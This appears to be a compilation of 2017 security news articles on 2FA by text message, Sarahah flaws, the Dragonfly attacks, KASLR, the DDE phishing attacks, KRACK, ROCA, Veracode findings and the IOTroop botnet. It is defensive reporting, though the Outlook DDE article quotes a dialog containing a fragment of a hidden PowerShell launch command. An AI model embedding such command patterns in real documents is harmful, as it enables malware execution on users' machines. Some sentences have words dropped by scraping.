Google slides text message 2FA a little closer to the door


Text messages aren’t a great way to implement two-factor authentication, but it’s a technique that’s stubbornly persistent. Now Google has decided to push things along by pushing its alternative into production.

The Chocolate Factory’s alternative is called “Google Prompt”. Instead of sending users a one-time code in a text message, it asks users if they are trying to sign in. If they are, in they go. If they’re not expecting the login prompt, down come the shutters.

Prompt first landed as a trial back in July, replacing 2FA with an app. As the company explained here, TXT-based 2FA is susceptible to phishing, so a prompt improves security.

Infosec bods have long warned that 2FA-by-text was insecure. Last year, NIST said it should be deprecated, and the problems were made manifest in May when attackers started exploiting Signalling System 7 (SS7) vulnerabilities to steal 2FA-protected logins.

Last month, Positive Technologies named gmail as one service still vulnerable to compromise via SS7.

Mountain View is following one of the NIST’s preferred paths, an app for 2FA.

For now, text-based 2FA will remain, as one of the second choices alongside Authenticator, backup codes, or Google’s Security Keys.

As the blog post noted, “This will only impact users who have not yet set up 2SV. Current 2SV users’ settings will be unaffected. In addition, if a user attempts to set up 2SV but doesn’t have a compatible mobile device, he or she will be prompted to use SMS as their authentication method instead.”

One reason for retaining text 2FA is that the Prompts app needs a data connection to work.

The 2FA app supports both Android and iOS phones (Apple users need the Google app to use Prompts). ®

The Joy and Pain of Buying IT – Have Your Say

Article source:

Sarahah anonymous feedback app told: ‘You’re riddled with web app flaws’


The web-based version of anonymous feedback app Sarahah is riddled with security flaws, according to a researcher.

Sarahah is a well established mobile app that allows people to receive anonymous feedback messages from friends and co-workers. Flaws in the technology make it vulnerable to web-based attacks including cross-site scripting and CSRF, according to security researcher Scott Helme.

Helme found that it was “trivially easy” to bypass Cross-Site Request Forgery (CSRF) protection in the app. CSRF is a class of attack that forces an end user to execute unwanted actions on a web application., another technology popular with teenagers, became a platform for insults and flaming, partly because of the ability to send anonymous messages brought out the worst in people.

The Sarahah app does seem to have some rudimentary filtering in place to prevent abuse of other members but it doesn’t include rate limiting. This omission meant Helme was able to anonymously send hundreds of messages to a test account.

Helme told El Reg that Sarahah exhibited numerous flaws he was surprised to find in a mature web app.

“My biggest worry is that this is a brand new application and the issues were not difficult to find at all,” Helme explained. “They are basic issues I wouldn’t expect to find in a new app and as a result I’m concerned the app hasn’t undergone any security testing prior to release. If it has then I’d be raising some very serious questions with the firm that did the testing as to why such fundamental flaws were missed.”

In response to queries from El Reg, Sarahah acknowledged Helme’s research had uncovered flaws in its technology. “We have passed the items to our developer and doing our best to solve the issues,” it said.

Sarahah is the number one app on Apple’s App Store and is number one in more than 10 countries on Google Play too.

Helme first reported issues to weeks ago in early August. He expressed frustration about the slow response.

“An app of this nature should be very security and privacy focused,” he explained. “I was disappointed at how difficult it was to contact the firm to responsibly disclose these issues that affect their users and how poor the response and handling was once I made contact.” ®

The Joy and Pain of Buying IT – Have Your Say

Article source:

US energy, nuke and aviation sectors under sustained attack


The United States’ Department of Homeland Security has issued an alert that warns of “advanced persistent threat (APT) actions targeting government entities and organizations in the energy, nuclear, water, aviation, and critical manufacturing sectors.”

The alert says an unknown actor has been at it since May 2017 and has compromised some networks.

Compiled with the help of the FBI, the alert also acknowledges Symantec’s September 2017 report on attacks labelled ‘Dragonfly’, and says “The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets.”

The attackers “are seeking to identify information pertaining to network and organizational design, as well as control system capabilities, within organizations.” The alert adds “the threat actors focused on identifying and browsing file servers within the intended victim’s network [and] viewed files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems. Based on DHS analysis of existing compromises, these files were originally named containing ICS vendor names and ICS reference documents pertaining to the organization (e.g., “SCADA WIRING DIAGRAM.pdf” or “SCADA PANEL LAYOUTS.xlsx”).”

The attacks were conducted with depressingly-familiar tactics: the perps would first figure out high-value targets in the organisations they sought to crack, then spear-phished them with emails bearing subject lines such as “AGREEMENT Confidential” containing benign attachments that “prompted the user to click on a link should a download not automatically begin.” In a colossal non-surprise, some of those links led to malware.

Other phishing campaigns led to fake login pages that harvested credentials.

Once the attackers had credentials, they loaded malware that started to sniff for and exfiltrate data, sometimes by creating new users on targeted domains.

The alert notes that the phishing payloads were legitimate attachments that did not contain malware, but exploited either user gullibility or known-to-be-risky features of tools like initiating downloads of documents using Server Message Block.

The attackers’ tactics worked just as well on standalone computers as they did on virtual desktops, a worrying outcome given government agencies frequent use of virtual PCs as a way to improve security.

The Department’s recommended actions therefore reference existing and long-standing security advice and include things like deploying email and web filters, checking for obvious signs of intrusion like frequent deletion of log files and checking to see if new users have unexpectedly been created.

The alert doesn’t say what damage, if any, the attacks have wrought. Nor does it attempt to reveal the origins of the attacks, although the Department has previously suggested [PDF] that Dragonfly was a Kremlin-sponsored operation. ®

The Joy and Pain of Buying IT – Have Your Say

Article source:

NetBSD, OpenBSD improve kernel security, randomly


The folks at NetBSD have released their first cut of code to implement kernel ASLR – Address Space Layout Randomisation – for 64-bit AMD processors.

The KASLR release randomises where the NetBSD kernel loads in memory, giving the kernel the same security protections that ASLR gives applications.

Randomising code’s memory location makes it harder to exploit bug classes like buffer overruns, since an attacker can’t easily predict (and access) the memory location exposed by the bug.

As developer Maxime Villard explains, the current implementation puts a specialised kernel, “prekern”, between the bootloader and the kernel.

“The kernel is compiled as a raw library with the GENERIC_KASLR configuration file, while the prekern is compiled as a static binary. When the machine boots, the bootloader jumps into the prekern. The prekern relocates the kernel at a random virtual address (VA), and jumps into it. Finally, the kernel performs some cleanup, and executes normally.”

Villard adds that the implementation is incomplete: for example, wherever the kernel is put by prekern, it lands in a contiguous block of memory.

That makes the direction of future development pretty obvious, with the main items being:

  • Randomise the kernel sections independently, and intertwine them;
  • Modify several kernel entry points not to leak kernel addresses to userland;
  • Randomise the kernel heap too (which is still static for now).”

The OpenBSD project offered its first look at a similar approach back in June, referred to as KARL (kernel address randomised links).

That effort became mainstream early this month in OpenBSD 6.2. ®

The Joy and Pain of Buying IT – Have Your Say

Article source:

New phishing campaign uses 20-year-old Microsoft mess as bait


The ever-vigilant folk at the Internet Storm Centre (SANS) have spotted yet another campaign trying to drop the Locky ransomware using compromised Word files.

As Internet Storm Center handler Brad Duncan writes, the vector in the Word documents uses Microsoft Dynamic Data Exchange (DDE), a feature that lets Office application load data from another Office file. This is the kind of attack that last week was spotted in a phishing campaign launched at Freddie Mac.

Duncan outlines the attack approach in this flowchart:

Necurs Locky DDE attack - SANS

Image: Brad Duncan, SANS

The phishing messages carrying this attack come from the Necurs botnet, he writes, and as with other DDE attacks the aim is to convince users to OK through the security warnings. A fake invoice is the scammers’ preferred weapon.

If the attack cons the victim, the poisoned document fetches a downloader which in turn pulls a copy of Locky to decrypt at the target.

Once the ransomware’s launched and it’s encrypted the victim’s hard drive, Locky is deleted (a downloader is left behind), and a demand for 0.25 Bitcoin issued.

Duncan writes: “This is an interesting development, because it shows how the DDE attack technique has spread to large-scale distribution campaigns. It’s not new, and I’m not sure how effective it really is. If you know of anyone who was infected from one of these DDE-based Office documents, please tell your story in the comments.”

The Register noted last week that DDE (Dynamic Data Exchange) has been around since 1987, and it’s an increasingly-popular target for attackers.

Since users have to okay execution, Microsoft steadfastly insists DDE is a feature, not a bug. ®

The Joy and Pain of Buying IT – Have Your Say

Article source:

Office DDE attack works in Outlook too – here’s what to do


In the last two weeks, Sophos researchers have kept an eye on a vulnerability in Microsoft’s Dynamic Data Exchange (DDE) protocol used to send messages and share data between applications.

Yesterday, new developments revealed an additional dimension to this attack.

Early on, we noted that attackers could exploit DDE to launch malware via tainted Office attachments, for example in Word and Excel files, but without using macros. 

On Friday, independent reports surfaced showing that it’s possible to run DDE attacks in Outlook using emails and calendar invites formatted using Microsoft Outlook Rich Text Format (RTF), not just by sending Office files attached to emails.

In the original attack users had to be coaxed into opening malicious attachments. By putting the code into the email message body itself, the attack comes one step closer, meaning that the social engineering needed to talk a recipient into falling for it becomes easier.

The good news is that whether a DDE attack comes via an attachment or directly in an email or a calendar invite, you can stop the attack easily:

Just say no

Attachments, emails and calendar invites pop up two giveway warning dialogs before triggering a DDEAUTO attack; if you say “No” at either dialog then you prevent the attack. (SophosLabs is not yet aware of any mechanism to bypass these dialog boxes.)

First, you’ll see a warning like this when DDE is used:

This document contains links that may refer to other files. Do you want to update this document with the data from the linked files?

Clicking “No” will stop a DDE attack from running.

If you click “Yes” at the first dialog, you will see a second dialog warning that a command is about to be run (the text in parenthesis and the program names referenced at the end will vary):

The remote data (k powershell -w hidden -NoP -NoExit -) is not accessible. Do you want to start the application C:windowssystem32cmd.exe?

Again, clicking “No” will stop the attack.

You can also neuter DDE attacks embedded directly in emails by viewing all your messages in plain text format, regardless of the format they were sent in.

Note, however, this will disable all formatting, colours and images in all messages, including those sent in the popular HTML email format. This will make some messages harder to read and may prevent you seeing content that the sender is expecting you to to see.

Please check the Microsoft Support website for details of how to view all emails in plain text format in Outlook.

Article source:

A plethora of patches, Kaspersky hits back, new hope for Wannacry Brit hero – and more


Roundup IT admins aren’t always fond of patching. It’s like going to the dentist – it needs to be done but it can be a pain to do. Sadly, this week there was a lot of patching to be done.

The Wi-Fi WPA2 weakness dubbed KRACK burdened Android, Linux and macOS users at work and home with patch installation responsibilities, and Cisco added to the load with a bumper crop of four worryingly fixes for various security bugs, ranging from denial-of-service to authorization bypasses: two patches for its IP phones, one for FXOS and NX-OS users, and a critical fix for its Cloud Services Platform.

There is at least some good news on the patching front. Samsung users will have got their latest Android patches sent through automatically, and Huawei has said it is getting tighter about sending out updates to its handsets. And Debian fixed up a little embarrassing oversight in its ftpsync tool used to mirror the Linux distro.

If you have a Lenovo Android tablet, VIBE, Moto or ZUK phone, please grab and install this patch to avoid being hacked over the air: the mechanism Lenovo uses to push updates to devices can be hijacked by malicious code to install malware.

And if you use an Axalto or Gemalto .NET v2 smartcard, be aware the Infineon TPM cryptography screw up may well affect the security of your devices.

Meanwhile, there were some rather breathless headlines this week about a secret silo of un-patched security vulnerabilities in Microsoft products that Redmond was keeping all to itself, which hackers obtained in 2013. This led to much wailing about how could nasty old Microsoft be allowed to get away with this.

Yet, virtually every software company has the same sort of silo: it’s called a bug database, and contains all the things engineers are planning to fix and is usually kept confidential. Yes, it appears Microsoft did get hacked, meaning details of exploitable bugs potentially fell into the wrong hands, and the IT giant said as much at the time. Its Apple Mac computers, how ironic, were among its corporate machines compromised by the intruders, who then scoured other parts of Redmond’s internal networks for valuable information. However, the biz claims it all led to nothing.

“In February 2013, we commented on the discovery of malware, similar to that found by other companies at the time, on a small number of computers including some in our Mac business unit,” a Microsoft spokesperson told The Register. “Our investigation found no evidence of information being stolen and used in subsequent attacks.”

Eugene throws shade but IT bosses are the worst snoops

It’s clear that Eugene Kaspersky isn’t going to back down over claims that his antivirus giant was helping Russian intelligence spy on millions of computers around the world. In a lengthy blog post he offered an update in the situation.

“The past year has seen concerns about KL change from ‘what if their technology could be a tool for cyber-espionage by nation states’ to ‘they were hacked and used as a vehicle to spy on spies’,” he wrote. “And while it’s hard for us to keep up with the constantly evolving narrative, ask yourself one thing: ‘if these recent allegations are true, where’s the evidence?’”

One thing he didn’t mention, but we were wondering about, is that if the NSA staffer who was apparently taking work home is such a specialist, it’s rather interesting that the AV system this person chose for their home PC was Kaspersky. That’s quite an endorsement when you think about it.

While we’re on the topic of spying, a survey out this week from governance group One Identity found out the biggest snoops on IT networks are the IT bosses themselves. Some 56 per cent of IT security staffers admitted to looking at other people’s data on the network, but that rose to 71 per cent with IT management.

As for actual data theft, there appears to be trouble brewing for South Africa. Troy Hunt, who runs the Have I Been Pwned website, claims to have found an archive online containing the personal data of every pensioner in South Africa.

Hunt said that the archive is a 27.2GB backup file and that he found names, gender, ethnicity, home ownership records, people’s identity numbers and contact information. The data also contained and other information like their estimated income and details of their employer.

After opening it up, Hunt found 31.6 million records, but then the archive folder crashed. He estimated there could be 47 million records in all and this archive is just sitting out on torrenting sites for anyone to see.

Hutchins moves closer to freedom

So as not to end on a downer there’s some great news for Marcus Hutchins, the Brit malware researcher who stopped the Wannacry ransomware outbreak by discovering and activating its kill switch, and then got pinched by the Feds in the US and accused of being a black hat hacker himself.

After a short sojourn in jail, Hutchins was bailed, and is now living in Los Angeles, California, while he awaits trial and fend off claims he helped developed malware that targeted online bank accounts back in the day. He’s under a strict curfew, can’t really do his day job of security research due to restrictions placed on him, and has to wear a GPS ankle bracelet at all times.

The downside of the latter condition is that the GPS unit isn’t waterproof. Hutchins is a keen surfer and is living near some of the most iconic surfing spots in the world, but can’t get in for fear of the GPS tracker dying in the sea and him being arrested.

But now a judge has ruled [PDF] that he can take it off and doesn’t have to be at home promptly at 9pm each night – thus allowing him a measure of normality and the chance to catch some breaks. Sadly though it’s not that simple. The US government has appealed the decision so he’s stuck on shore for the moment, but it’s a hopeful step. ®

The Joy and Pain of Buying IT – Have Your Say

Article source:

The Week in Crypto: Bad News for SSH, WPA2, RSA & Privacy

Between KRACK, ROCA, new threats to SSH keys, and the European Commission’s loosey-goosey stance on encryption backdoors, it’s been a difficult time for cryptography.

BY DAWN KAWAMOTO AND SARA PETERS — This week started off with a bang when the KRACK key reinstallation attack vulnerabilities upended the security of Wi-Fi and the ROCA factorization bug made all trusted platform module chips suddenly less trustworthy. That isn’t all the week had in store for the cryptography world, though.

Here’s a rundown on the latest news on KRACK, ROCA, and the news you might have missed about SSH and encryption backdoor regulation.

SSH Keys Being Scanned by Attackers and Ignored by Security
SSH (Secure Shell) got a little jolt this week, as well. Wordfence, a security service for WordPress, discovered a threat actor scanning up to 25,000 systems a day looking specifically for vulnerable private SSH keys. The attacker is specifically scanning for terms like “ssh,” “root,” and “id_rsa,” which might lead to a directory of private keys that was stored in the wrong place.

The rate of scanning for SSH keys from known-malicious IPs has continued at the same rate since Monday; roughly 25,000 systems per day, “which jumped up from just about zero,” according to Mark Maunder, CEO and founder of Wordfence.

In response, Wordfence is helping users determine if they have publicly exposed private SSH keys by adding this capability to their Gravity Scan service to users. Maunder says that users must prove site ownership before Gravity Scan will provide vulnerability details.

SSH is a ubiquitous but often overlooked cryptographic network protocol created largely as a secure alternative to telnet and rsh/rsec. It’s used for secure remote logins to remote computer systems and secure file transfer; it’s used not only for WordPress but across admin-to-machine and machine-to-machine communications in all manner of Linux- and Unix-based systems. 

[Don’t miss “Preventing Lateral Movement in Your IT Environment” with John Terrill, CISO of OPAQ Networks, at Dark Reading’s upcoming INsecurity conference, Nov. 29-30 in the D.C. area.]

So far, Wordfence has not seen any active exploits as a result of this SSH key hunt. Maunder says that problems like this are often a result of users accidentally placing private keys in the wrong place because they don’t know it’s a risk. “It’s really an education problem,” says Maunder. 

In a survey released Tuesday, conducted by Dimensional Research on behalf of Venafi, 90% of respondents conceded that they do not have a complete and accurate inventory of all their SSH keys, “so there is no way to determine if keys have been stolen, misused or should be trusted,” according to researchers.

The author of SSH, Tatu Ylonen, has himself lamented organizations’ woeful management of SSH keys and has suggested improvements to his protocol to eliminate problems like the proliferation of rogue keys. For now, though, respondents to Venafi’s study continue to commit the key management sins that SSH experts warn against. Forty percent of respondents do not rotate SSH keys at all, or only occasionally; 61% do not limit or monitor the number of administrators who manage SSH; 54% do not limit the locations from which SSH keys can be used (thereby making remote attacks easier); and 51% do not enforce “no port forwarding” rules (thereby effectively allowing users to bypass firewalls).

The Impact of KRACK
Key Reinstallation Attacks (KRACKs), which affect all modern Wi-Fi devices and access points, are hitting Cisco particularly hard. The networking giant released Thursday an updated security advisory on KRACK, noting 71 of its products had at least one or more of the 10 vulnerabilities tied to KRACK.

For Cisco’s customers using these products, there are currently no fixes available and only a workaround for one of the 10 vulnerabilities, the company notes.

“Cisco will release software updates that address these vulnerabilities. There is a workaround that addresses the vulnerability in CVE-2017-13082. There are no workarounds that address the other vulnerabilities described in this advisory,” the company stated.

In addition to the 71 products that are vulnerable to KRACK, Cisco has another 22 products it is actively investigating to determine if they are also at risk, the company notes.

Earlier this week, researchers at a Belgium university discovered the KRACK vulnerabilities in the Wi-Fi Protected Access II (WPA2) protocol that is used to secure Wi-Fi networks. These vulnerabilities can be exploited to allow attackers to decrypt data and information, hijack traffic, and other nefarious activities as the data and information moves across Wi-Fi networks.

The WPA2 encryption protocol flaws also have industry titans Microsoft, Apple, and Google hustling to develop patches for their devices, as TechCrunch reports.

Microsoft has a patch out for its Windows 7, Windows 8, Windows 8.1, and Windows 10 devices, but Apple is working to roll out a fix to customers and currently has a beta version of macOS, iOS, tvOS, and watchOS available for download, notes TechCrunch.

And while exact figures on the number of users who are affected by these KRACK vulnerabilities are not available, it would not be hard to envision millions of users could potentially be affected given the omnipresence of WPA2 encryption protocols in Wi-Fi devices.

The Electronic Frontier Foundation (EFF) released a few calming observations. One is that any attack would need to have an active antenna within range of the targeted wireless network and would require the interception and delay of many packets traveling on the Wi-Fi networks. The EFF states it’s a complex task to trick a device and reset its encryption key as packets are actively being broadcast. Additionally, sensitive Wi-Fi traffic would not be affected by the WPA2 vulnerabilities if the site is encrypted with HTTPS.

European Commission Discusses Encryption
The European Commission this week revisited the topic of encryption backdoors. The EC seemed to subtly say no to backdoors when releasing the statement that it would support law enforcement when it encountered encryption “without weakening encryption at a more general level or affecting a large or indiscriminate number of people.” However, its set of proposals to enhance law enforcement’s ability to obtain the electronic evidence it desires include “to support Europol to further develop its decryption capability.” It also stated that “in early 2018, the Commission will present proposals to provide for a legal framework to facilitate access to electronic evidence.” (Emphasis not added.)

ROCA Rocks
Another crypto vulnerability revealed this week includes The Return of Coppersmith’s Attack (ROCA). 

The ROCA flaw is found in the PC motherboard chipset inside Infineon Technology’s Trusted Platform Module, which is used to store encryption keys, passwords, and certificates, reports Kaspersky’s Threatpost.

When an RSA encryption key is generated, a remote attacker uses the value of a public key to compute the private key by crunching the numbers through practical factorization, according to researchers with the Centre for Research on Cryptography and Security at Masaryk University in the Czech Republic, Enigma Bridge in Cambridge, United Kingdom, and Ca’ Foscari University of Venice, Italy. These researchers discovered the vulnerability.

Once the private key has been compromised, attackers can impersonate the legitimate owner, decrypt sensitive messages, engage in signature forgery, and other attacks, according to a blog post by the researchers.

The researchers discovered the flaws when inspecting a large number of RSA keys that were generated and exported from the manufacturer of smartcards. The group notified Infineon Technologies of the vulnerability in February and also reached out to other affected parties, such as, Microsoft, Google, HP, Lenovo, and Fujitsu, which have since released updates.

“We found and analyzed vulnerable keys in various domains including electronic citizen documents, authentication tokens, trusted boot devices, software package signing, TLS/HTTPS keys and PGP,” the researchers stated. “The currently confirmed number of vulnerable keys found is about 760,000 but possibly up to two to three magnitudes more are vulnerable.”

Researchers noted Friday that “Gemalto IDPrime .NET smart cards have been generating weak RSA keys since 2008 or earlier.” You can check if keys are vulnerable here.

Related Content:


Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.


Dawn Kawamoto is an Associate Editor for Dark Reading, where she covers cybersecurity news and trends. She is an award-winning journalist who has written and edited technology, management, leadership, career, finance, and innovation stories for such publications as CNET’s … View Full Bio

Article source:

Veracode: 75% Of Apps Have at Least One Vulnerability on Initial Scan

But developers not the only ones to blame, company says.

Application security continues to stink at many organizations, a new report from Veracode shows. But developers are not the only ones to blame. 

A failure by organizations to provide adequate security training and by operational teams to address vulnerabilities in the production environment have a big impact on application safety as well, the company said.

Veracode’s State of Software Security 2017 report is based on a code-level analysis of nearly 250 billion lines of code across 400,000 assessments conducted for 1,400 customers between April 2016 and March 2017.

The analysis showed more than 75% of the applications having one or more security vulnerabilities in code written by the development team, on initial scan. About 12% had either a very-high-severity or a high-severity flaw on first scan. A startling 88%, nearly nine out of 10, Java applications had at least one serious component-level flaw.

[See Veracode’s vice president of research Chris Eng discuss Security, Application Development and DevOps at DarkReading’s upcoming INsecurity Conference, Nov. 29-30 in the D.C. area.]

Veracode’s 2017 analysis found applications riddled with the same vulnerabilities that it uncovered last year. Information leakage flaws were most common and were present in more than 65% of the applications in which a security bug was found on initial scan. About 62% had cryptographic flaws while 56% had what Veracode described as code quality issues.

The Top 10 list of most frequent vulnerabilities on initial scan this year was identical to the list of top flaws last year and suggested that organizations are continuing to grapple with the same issues as they have been for quite some time.

“This year’s study included confirmation of trends we’ve seen for a while,” says Tim Jarrett, senior director of product marketing at Veracode. But there were also some surprises, he says.

The analysis, for instance showed accelerating adoption of scanning earlier in the software development lifecycle, he says. The number of organizations doing at least 12 scans per year ticked up slightly from 10.5% to 11.1%. Over 36% though continued to do just one scan per year.

There was also evidence that findings, which are prioritized by a policy, for instance higher severity findings, get fixed about twice as often as do findings not prioritized by policy, Jarrett says.

“We see evidence that scan frequencies are increasing, with a 3% to 4% increase in applications scanning at least daily,” he says. “[Such] frequent scanning is a sign of both early-lifecycle scanning and automated scanning.” But the majority of applications are still only being tested quarterly—or less frequently. “There’s plenty of room for improvement,” he notes.

Developers, according to Veracode, are not the only ones to blame for the continuing struggles with applications that many organizations appear to be having.

“It’s time to put the lazy developer trope to bed,” the company noted in its report.  “It may be easy for cybersecurity pros to blame AppSec woes on indifferent, uncaring, or slothful coders.” But the reality is very different, Veracode said.

Operational teams for instance have a part in undermining application security as well. When Veracode took a look at the overall hygiene of the production environments at the organizations in its survey the company found an “alarming number” of vulnerable servers running production applications.

When Veracode queried the public-facing web applications of the companies in its report, it discovered nearly 25% of the sites operating on web servers with one or more vulnerabilities with a CVSS rating of 6 or higher. Nearly 19% had web servers that were at least a decade old.

At many organizations developers also simply don’t get the security training they require. Few managers consider a software developer’s security skills as an important metric when evaluating performance, the application security vendor noted.

The Veracode report quoted a previous study the company had sponsored, in which 68 percent of developers and IT pros said their organizations did not provide adequate security training. Some 76% in that survey said they had not been required to take a single security course in college. Another study that Veracode conducted with analyst firm Enterprise Strategy Group showed a high-level of awareness about the importance of security knowledge among development teams. But only 18% said security was the most important metric for measuring developers’ performance, Veracode said.

Related content:


Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source:

IOTroop Botnet Hits Over a Million Organizations in Under 30 Days

The IoT botnet is expected to spread faster than Mirai.

A new IoT botnet dubbed IOTroop is expected to spread faster than Mirai because it has infected more than 1 million organizations since its discovery in late September, according to Check Point Software Technologies, which made the discovery.

IOTroop’s malware seeks out vulnerabilities in wireless IP camera devices, such as GoAhead, D-Link, TP-Link, AVTECH, NETGEAR, MikroTik, Linksys, Synology, and others. “The malware is able to spread faster than Mirai for it leverages numerous vulnerabilities, rather than only compromising devices that use default credentials,” says Maya Horowitz, Check Point’s group manager of Threat Intelligence.

Although IOTroop shares some technical aspects with Mirai, Check Point stresses it is a new botnet with a far more sophisticated attack campaign. IOTroop, for example, uses the Internet of Things devices that it infects to scan additional devices and report back to the command-and-control server with its findings, Horowitz says. This helps IOTroop to accelerate the speed at which it spreads, she notes. IOTroop takes advantage of users’ failure to patch existing vulnerabilities in their IoT devices, and also the ability to launch its malware without human interaction.

Read more about IOTroop here

Dawn Kawamoto is an Associate Editor for Dark Reading, where she covers cybersecurity news and trends. She is an award-winning journalist who has written and edited technology, management, leadership, career, finance, and innovation stories for such publications as CNET’s … View Full Bio

Article source: